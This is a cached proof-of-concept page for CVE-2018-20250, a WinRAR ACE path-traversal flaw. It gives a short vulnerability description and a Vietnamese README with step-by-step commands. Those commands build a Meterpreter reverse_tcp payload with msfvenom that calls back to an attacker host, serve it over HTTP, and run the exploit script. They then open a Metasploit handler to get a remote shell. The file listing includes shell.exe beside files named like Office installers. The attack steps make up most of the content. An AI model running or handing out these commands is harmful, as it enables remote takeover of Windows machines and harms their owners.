Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-20250 PoC — WinRar 路径遍历漏洞

Source
Associated Vulnerability
Title:WinRar 路径遍历漏洞 (CVE-2018-20250)
Description:WinRAR是一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRar中存在目录遍历漏洞。该漏洞源于WinRAR在解压处理ACE格式的文件过程中,未对ACE文件头结构中的“filename”字段进行充分过滤。攻击者可利用该漏洞以提升的权限执行任意代码。
Readme
## Setup
- Video demo: https://youtu.be/5tuWsi1tGS0
- VirtualBox Machine: https://j2c.cc/virtualbox-machine
- Winrar 5.5 32bit: https://j2c.cc/winrar-550-32bit
## Các bước tiến hành
- Kali:
```
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
```
- Windows:
```
git clone https://github.com/LamSonBinh/CVE-2018-20250
py exp.py
```
- Kali:
```
python3 -m http.server
```
- Windows:
10.0.0.199:8000
- Kali:
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set lport 1234
set lhost 10.0.0.199
exploit -j

sessions
sessions 1
sysinfo
shell
```
File Snapshot

[4.0K] /data/pocs/5da26d9612d71413ac431d52f16b5f8fea5ff223 ├── [ 45] account.txt ├── [155K] acefile.py ├── [4.0K] exp.py ├── [8.0M] Office365Setup.rar ├── [8.0M] OfficeSetup.exe ├── [ 630] README.md └── [ 72K] shell.exe 0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.